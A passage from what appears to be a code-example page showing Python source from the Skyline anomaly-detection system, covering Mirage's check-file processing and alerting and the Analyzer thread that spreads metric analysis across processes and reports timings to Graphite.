            logger.info('retrieved data    :: for %s at %s seconds' % (
                metric_vars.metric, second_order_resolution_seconds))

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        self.check_if_parent_is_alive()

        with open((metric_json_file), 'r') as f:
            timeseries = json.loads(f.read())
            logger.info('data points surfaced :: %s' % (len(timeseries)))

        try:
            logger.info('analyzing         :: %s at %s seconds' % (metric_vars.metric, second_order_resolution_seconds))
            anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_vars.metric, second_order_resolution_seconds)

            # If it's anomalous, add it to list
            if anomalous:
                base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
                anomalous_metric = [datapoint, base_name]
                self.anomalous_metrics.append(anomalous_metric)
                logger.info('anomaly detected  :: %s with %s' % (metric_vars.metric, metric_vars.value))
                # It runs so fast, this allows us to process 30 anomalies/min
                sleep(2)

                # Get the anomaly breakdown - who returned True?
                triggered_algorithms = []
                for index, value in enumerate(ensemble):
                    if value:
                        algorithm = settings.MIRAGE_ALGORITHMS[index]
                        anomaly_breakdown[algorithm] += 1
                        triggered_algorithms.append(algorithm)

                # If Crucible or Panorama are enabled determine details
                determine_anomaly_details = False
                if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
                    determine_anomaly_details = True
                if settings.PANORAMA_ENABLED:
                    determine_anomaly_details = True

                if determine_anomaly_details:
                    metric_timestamp = str(int(timeseries[-1][0]))
                    from_timestamp = str(int(timeseries[1][0]))
                    timeseries_dir = base_name.replace('.', '/')

                # If Panorama is enabled - create a Panorama check
                if settings.PANORAMA_ENABLED:
                    if not os.path.exists(settings.PANORAMA_CHECK_PATH):
                        if python_version == 2:
                            mode_arg = int('0755', 8)
                        if python_version == 3:
                            mode_arg = 0o755
                        os.makedirs(settings.PANORAMA_CHECK_PATH, mode_arg)

                    # Note:
                    # The values are enclosed in single quotes intentionally,
                    # as the imp.load_source used results in a shift in the
                    # decimal position when double quoted, e.g.
                    # value = "5622.0" gets imported as
                    # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                    # single quoting results in the desired,
                    # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                    added_at = str(int(time()))
                    source = 'graphite'
                    panaroma_anomaly_data = 'metric = \'%s\'\n' \
                                            'value = \'%s\'\n' \
                                            'from_timestamp = \'%s\'\n' \
                                            'metric_timestamp = \'%s\'\n' \
                                            'algorithms = %s\n' \
                                            'triggered_algorithms = %s\n' \
                                            'app = \'%s\'\n' \
                                            'source = \'%s\'\n' \
                                            'added_by = \'%s\'\n' \
                                            'added_at = \'%s\'\n' \
                        % (base_name, str(datapoint), from_timestamp,
                           metric_timestamp, str(settings.MIRAGE_ALGORITHMS),
                           triggered_algorithms, skyline_app, source,
                           this_host, added_at)

                    # Create an anomaly file with details about the anomaly
                    panaroma_anomaly_file = '%s/%s.%s.txt' % (
                        settings.PANORAMA_CHECK_PATH, added_at,
                        base_name)
                    try:
                        write_data_to_file(
                            skyline_app, panaroma_anomaly_file, 'w',
                            panaroma_anomaly_data)
                        logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                    except:
                        logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
                        logger.info(traceback.format_exc())

                # If crucible is enabled - save timeseries and create a
                # crucible check
                if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
                    metric_timestamp = str(int(timeseries[-1][0]))
                    from_timestamp = str(int(timeseries[1][0]))
                    timeseries_dir = base_name.replace('.', '/')
                    crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                    if not os.path.exists(crucible_anomaly_dir):
                        if python_version == 2:
                            mode_arg = int('0755', 8)
                        if python_version == 3:
                            mode_arg = 0o755
                        os.makedirs(crucible_anomaly_dir, mode_arg)

                    # Note:
                    # The value is enclosed in single quotes intentionally,
                    # as the imp.load_source used in crucible results in a
                    # shift in the decimal position when double quoted, e.g.
                    # value = "5622.0" gets imported as
                    # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                    # single quoting results in the desired,
                    # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0

                    crucible_anomaly_data = 'metric = \'%s\'\n' \
                                            'value = \'%s\'\n' \
                                            'from_timestamp = \'%s\'\n' \
                                            'metric_timestamp = \'%s\'\n' \
                                            'algorithms = %s\n' \
                                            'triggered_algorithms = %s\n' \
                                            'anomaly_dir = \'%s\'\n' \
                                            'graphite_metric = True\n' \
                                            'run_crucible_tests = False\n' \
                                            'added_by = \'%s\'\n' \
                                            'added_at = \'%s\'\n' \
                        % (base_name, str(datapoint), from_timestamp,
                           metric_timestamp, str(settings.MIRAGE_ALGORITHMS),
                           triggered_algorithms, crucible_anomaly_dir,
                           skyline_app, metric_timestamp)

                    # Create an anomaly file with details about the anomaly
                    crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                    try:
                        write_data_to_file(
                            skyline_app, crucible_anomaly_file, 'w',
                            crucible_anomaly_data)
                        logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file))
                    except:
                        logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file))
                        logger.info(traceback.format_exc())

                    # Create timeseries json file with the timeseries
                    json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
                    timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                    try:
                        write_data_to_file(skyline_app, json_file, 'w', timeseries_json)
                        logger.info('added crucible timeseries file :: %s' % (json_file))
                    except:
                        logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file))
                        logger.info(traceback.format_exc())

                    # Create a crucible check file
                    crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                    try:
                        write_data_to_file(
                            skyline_app, crucible_check_file, 'w',
                            crucible_anomaly_data)
                        logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))
                    except:
                        logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file))
                        logger.info(traceback.format_exc())
            else:
                base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
                not_anomalous_metric = [datapoint, base_name]
                self.not_anomalous_metrics.append(not_anomalous_metric)
                logger.info('not anomalous     :: %s with %s' % (metric_vars.metric, metric_vars.value))

        # It could have been deleted by the Roomba
        except TypeError:
            exceptions['DeletedByRoomba'] += 1
            logger.info('exceptions        :: DeletedByRoomba')
        except TooShort:
            exceptions['TooShort'] += 1
            logger.info('exceptions        :: TooShort')
        except Stale:
            exceptions['Stale'] += 1
            logger.info('exceptions        :: Stale')
        except Boring:
            exceptions['Boring'] += 1
            logger.info('exceptions        :: Boring')
        except:
            exceptions['Other'] += 1
            logger.info('exceptions        :: Other')
            logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.mirage_anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.mirage_exceptions_q.put((key, value))

        # Remove metric check file
        try:
            os.remove(metric_check_file)
        except OSError:
            pass

    def run(self):
        """
        Called when the process initializes.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('error :: skyline cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            """
            Determine if any metric to analyze
            """
            while True:

                # Report app up
                self.redis_conn.setex(skyline_app, 120, now)

                metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
                if len(metric_var_files) == 0:
                    logger.info('no metric check files to process - sleeping...')
                    sleep(10)
                else:
                    sleep(1)

                # Clean up old files
                now_timestamp = time()
                stale_age = now_timestamp - settings.MIRAGE_STALE_SECONDS
                for current_file in listdir(settings.MIRAGE_CHECK_PATH):
                    if os.path.isfile(settings.MIRAGE_CHECK_PATH + "/" + current_file):
                        t = os.stat(settings.MIRAGE_CHECK_PATH + "/" + current_file)
                        c = t.st_ctime
                        # Delete the check file if it is older than MIRAGE_STALE_SECONDS
                        if c < stale_age:
                            os.remove(settings.MIRAGE_CHECK_PATH + "/" + current_file)
                            logger.info('removed %s' % (current_file))

                # Discover metric to analyze
                metric_var_files = ''
                metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
                if len(metric_var_files) > 0:
                    break

            metric_var_files_sorted = sorted(metric_var_files)
            metric_check_file = settings.MIRAGE_CHECK_PATH + "/" + metric_var_files_sorted[0]

            logger.info('processing %s' % metric_var_files_sorted[0])

            # Remove any existing algorithm.error files from any previous runs
            # that did not cleanup for any reason
            pattern = '%s.*.algorithm.error' % skyline_app
            try:
                for f in os.listdir(settings.SKYLINE_TMP_DIR):
                    if re.search(pattern, f):
                        try:
                            os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
                            logger.info('cleaning up old error file - %s' % (str(f)))
                        except OSError:
                            pass
            except:
                logger.error('failed to cleanup mirage_algorithm.error files - %s' % (traceback.format_exc()))

            # Spawn processes
            pids = []
            spawned_pids = []
            pid_count = 0
            MIRAGE_PROCESSES = 1
            run_timestamp = int(now)
            for i in range(1, MIRAGE_PROCESSES + 1):
                p = Process(target=self.spin_process, args=(i, run_timestamp))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(MIRAGE_PROCESSES)))
                p.start()
                spawned_pids.append(p.pid)

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than settings.MAX_ANALYZER_PROCESS_RUNTIME - 20160512 @earthgecko
            p_starts = time()
            while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (
                        skyline_app, str(MIRAGE_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Log the last reported error by any algorithms that errored in the
            # spawned processes from algorithms.py
            for completed_pid in spawned_pids:
                logger.info('spin_process with pid %s completed' % (str(completed_pid)))
                for algorithm in settings.MIRAGE_ALGORITHMS:
                    algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % (
                        settings.SKYLINE_TMP_DIR, skyline_app,
                        str(completed_pid), algorithm)
                    if os.path.isfile(algorithm_error_file):
                        logger.info(
                            'error - spin_process with pid %s has reported an error with the %s algorithm' % (
                                str(completed_pid), algorithm))
                        try:
                            with open(algorithm_error_file, 'r') as f:
                                error_string = f.read()
                            logger.error('%s' % str(error_string))
                        except:
                            logger.error('failed to read %s error file' % algorithm)
                        try:
                            os.remove(algorithm_error_file)
                        except OSError:
                            pass

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.mirage_anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.mirage_exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            for metric_variable in self.metric_variables:
                if metric_variable[0] == 'metric_name':
                    metric_name = metric_variable[1]
                if metric_variable[0] == 'metric_value':
                    metric_value = metric_variable[1]
                if metric_variable[0] == 'hours_to_resolve':
                    hours_to_resolve = metric_variable[1]
                if metric_variable[0] == 'metric_timestamp':
                    metric_timestamp = metric_variable[1]

            logger.info('analysis done - %s' % metric_name)

            # Send alerts
            # Calculate hours second order resolution to seconds
            logger.info('analyzed at %s hours resolution' % hours_to_resolve)
            second_order_resolution_seconds = int(hours_to_resolve) * 3600
            logger.info('analyzed at %s seconds resolution' % second_order_resolution_seconds)

            if settings.MIRAGE_ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        ALERT_MATCH_PATTERN = alert[0]
                        METRIC_PATTERN = metric[1]
                        alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                        pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                        if pattern_match:
                            cache_key = 'mirage.last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric, second_order_resolution_seconds)
                                    logger.info('sent %s alert: For %s' % (alert[1], metric[1]))
                            except Exception as e:
                                logger.error('error :: could not send %s alert for %s: %s' % (alert[1], metric[1], e))

            if settings.NEGATE_ANALYZER_ALERTS:
                if len(self.anomalous_metrics) == 0:
                    for negate_alert in settings.ALERTS:
                        for not_anomalous_metric in self.not_anomalous_metrics:
                            NEGATE_ALERT_MATCH_PATTERN = negate_alert[0]
                            NOT_ANOMALOUS_METRIC_PATTERN = not_anomalous_metric[1]
                            alert_match_pattern = re.compile(NEGATE_ALERT_MATCH_PATTERN)
                            negate_pattern_match = alert_match_pattern.match(NOT_ANOMALOUS_METRIC_PATTERN)
                            if negate_pattern_match:
                                try:
                                    logger.info('negate alert sent: For %s' % (not_anomalous_metric[1]))
                                    trigger_negater(negate_alert, not_anomalous_metric, second_order_resolution_seconds, metric_value)
                                except Exception as e:
                                    logger.error('error :: could not send alert: %s' % e)

            # Log progress

            if len(self.anomalous_metrics) > 0:
                logger.info('seconds since last anomaly :: %.2f' % (time() - now))
                logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
                logger.info('exception stats   :: %s' % exceptions)
                logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Reset counters
            self.anomalous_metrics[:] = []
            self.not_anomalous_metrics[:] = []

            # Reset metric_variables
            self.metric_variables[:] = []

            # Sleep if it went too fast
            if time() - now < 1:
                logger.info('sleeping due to low run time...')
#                sleep(10)
                sleep(1)
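
The comment blocks above stress that value is written single quoted because the check files are later imported with imp.load_source, and double quoting can shift the decimal position. Below is a minimal sketch of that round trip, assuming Python 2 or a Python 3 version that still ships the deprecated imp module; the file path and metric values are illustrative only, not Mirage's own code.

import imp
from time import time

# Write a check file in the same key = 'value' style used by Mirage above;
# single quoting the value keeps 5622.0 as 5622.0 when the file is imported
check_file = '/tmp/mirage_check_example.txt'
check_data = 'metric = \'stats.example.requests\'\n' \
             'value = \'5622.0\'\n' \
             'hours_to_resolve = \'168\'\n' \
             'metric_timestamp = \'%s\'\n' % str(int(time()))
with open(check_file, 'w') as fh:
    fh.write(check_data)

# The check file is valid Python, so it can be imported as a module of
# metric variables - the same idea load_metric_vars relies on
metric_vars = imp.load_source('metric_vars', check_file)
print(metric_vars.metric, metric_vars.value)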
Ejemplo n.º 50
0
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned processes.
    """
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        """
        super(Analyzer, self).__init__()
        # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
        if settings.REDIS_PASSWORD:
            self.redis_conn = StrictRedis(
                password=settings.REDIS_PASSWORD,
                unix_socket_path=settings.REDIS_SOCKET_PATH)
        else:
            self.redis_conn = StrictRedis(
                unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        """
        Sends the skyline_app metrics to the `GRAPHITE_HOST` if a graphite
        host is defined.
        """
        if settings.GRAPHITE_HOST != '':

            skyline_app_metric = skyline_app_graphite_namespace + name

            sock = socket.socket()
            sock.settimeout(10)

            # Handle connection error to Graphite #116 @etsy
            # Fixed as per https://github.com/etsy/skyline/pull/116 and
            # mlowicki:etsy_handle_connection_error_to_graphite
            # Handle connection error to Graphite #7 @ earthgecko
            # merged 1 commit into earthgecko:master from
            # mlowicki:handle_connection_error_to_graphite on 16 Mar 2015
            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
                sock.settimeout(None)
            except socket.error:
                sock.settimeout(None)
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

            # For the same reason as above
            # sock.sendall('%s %s %i\n' % (name, value, time()))
            try:
                sock.sendall('%s %s %i\n' %
                             (skyline_app_metric, value, time()))
                sock.close()
                return True
            except:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

        return False

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Multi-get the assigned_metrics for the process from Redis.

        For each metric:\n
        * unpack the `raw_timeseries` for the metric.\n
        * Analyse each timeseries against `ALGORITHMS` to determine if it is\n
          anomalous.\n
        * If anomalous add it to the :obj:`self.anomalous_metrics` list\n
        * Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q` queue\n

        Add keys and values to the queue so the parent process can collate for:\n
        * :py:obj:`self.anomaly_breakdown_q`
        * :py:obj:`self.exceptions_q`
        """

        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(
            ceil(
                float(len(unique_metrics)) /
                float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)
        # assigned_keys = range(300, 310)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            # logger.info('analysing %s' % metric_name)

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(
                    timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE,
                                                    '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

            # It could have been deleted by the Roomba
            except TypeError:
                # logger.error('TypeError analysing %s' % metric_name)
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                # logger.error('TooShort analysing %s' % metric_name)
                exceptions['TooShort'] += 1
            except Stale:
                # logger.error('Stale analysing %s' % metric_name)
                exceptions['Stale'] += 1
            except Boring:
                # logger.error('Boring analysing %s' % metric_name)
                exceptions['Boring'] += 1
            except:
                # logger.error('Other analysing %s' % metric_name)
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        Called when the process initializes.

        Determine if Redis is up and discover the number of `unique metrics`.

        Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
        and assign each process a set of metrics to analyse for anomalies.

        Wait for the processes to finish.

        Determine whether any anomalous metrics require:\n
        * alerting on (and set `EXPIRATION_TIME` key in Redis for alert).\n
        * feeding to another module e.g. mirage.

        Populate the webapp json with the anomalous_metrics details.

        Log the details about the run to the skyline log.

        Send skyline.analyzer metrics to `GRAPHITE_HOST`.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' %
                             skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error(
                'error - bin/%s.d log management seems to have failed, continuing'
                % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' %
                             skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            if python_version == 2:
                os.makedirs(settings.SKYLINE_TMP_DIR, 0750)
            if python_version == 3:
                os.makedirs(settings.SKYLINE_TMP_DIR, mode=0o750)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error(
                    'skyline can\'t connect to redis at socket path %s' %
                    settings.REDIS_SOCKET_PATH)
                sleep(10)
                # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
                if settings.REDIS_PASSWORD:
                    self.redis_conn = StrictRedis(
                        password=settings.REDIS_PASSWORD,
                        unix_socket_path=settings.REDIS_SOCKET_PATH)
                else:
                    self.redis_conn = StrictRedis(
                        unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(
                self.redis_conn.smembers(settings.FULL_NAMESPACE +
                                         'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info(
                    'no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Use count files rather than multiprocessing.Value to enable
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                # with open(algorithm_count_file, 'a') as f:
                with open(algorithm_count_file, 'w') as f:
                    pass
                with open(algorithm_timings_file, 'w') as f:
                    pass

            # Spawn processes
            pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info(
                        'WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' %
                            (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds
            p_starts = time()
            while time() - p_starts <= 180:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info(
                        '%s :: %s spin_process/es completed in %.2f seconds' %
                        (skyline_app, str(
                            settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info(
                    '%s :: timed out, killing all spin_process processes' %
                    (skyline_app))
                for p in pids:
                    p.terminate()
                    # p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Push to panorama
#            if len(self.panorama_anomalous_metrics) > 0:
#                logger.info('to do - push to panorama')

# Push to crucible
#            if len(self.crucible_anomalous_metrics) > 0:
#                logger.info('to do - push to crucible')

# Write anomalous_metrics to static webapp directory

# Use count files rather than multiprocessing.Value to enable
# metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                try:
                    algorithm_count_array = []
                    with open(algorithm_count_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace(
                                "'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_count_array.append(float_value)
                except:
                    algorithm_count_array = False

                if not algorithm_count_array:
                    continue

                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info('algorithm run count - %s run %s times' %
                            (algorithm, str(number_of_times_algorithm_run)))
                if number_of_times_algorithm_run == 0:
                    continue

                try:
                    algorithm_timings_array = []
                    with open(algorithm_timings_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace(
                                "'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_timings_array.append(float_value)
                except:
                    algorithm_timings_array = False

                if not algorithm_timings_array:
                    continue

                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info('algorithm timings count - %s has %s timings' %
                            (algorithm, str(number_of_algorithm_timings)))

                if number_of_algorithm_timings == 0:
                    continue

                try:
                    _sum_of_algorithm_timings = sum(algorithm_timings_array)
                except:
                    logger.error("sum error: " + traceback.format_exc())
                    _sum_of_algorithm_timings = round(0.0, 6)
                    logger.error('error - sum_of_algorithm_timings - %s' %
                                 (algorithm))
                    continue

                sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6)
                # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings))

                try:
                    _median_algorithm_timing = determine_median(
                        algorithm_timings_array)
                except:
                    _median_algorithm_timing = round(0.0, 6)
                    logger.error('error - _median_algorithm_timing - %s' %
                                 (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)
                # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing))

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' %
                    (algorithm, sum_of_algorithm_timings,
                     median_algorithm_timing))
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.times_run'
                self.send_graphite_metric(send_metric_name,
                                          '%d' % number_of_algorithm_timings)
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.total_time'
                self.send_graphite_metric(send_metric_name,
                                          '%.6f' % sum_of_algorithm_timings)
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.median_time'
                self.send_graphite_metric(send_metric_name,
                                          '%.6f' % median_algorithm_timing)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' %
                        (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' %
                        len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('run_time', '%.2f' % (time() - now))
            self.send_graphite_metric(
                'total_analyzed',
                '%.2f' % (len(unique_metrics) - sum(exceptions.values())))
            self.send_graphite_metric('total_anomalies',
                                      '%d' % len(self.anomalous_metrics))
            self.send_graphite_metric('total_metrics',
                                      '%d' % len(unique_metrics))
            for key, value in exceptions.items():
                send_metric = 'exceptions.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)
            for key, value in anomaly_breakdown.items():
                send_metric = 'anomaly_breakdown.%s' % key
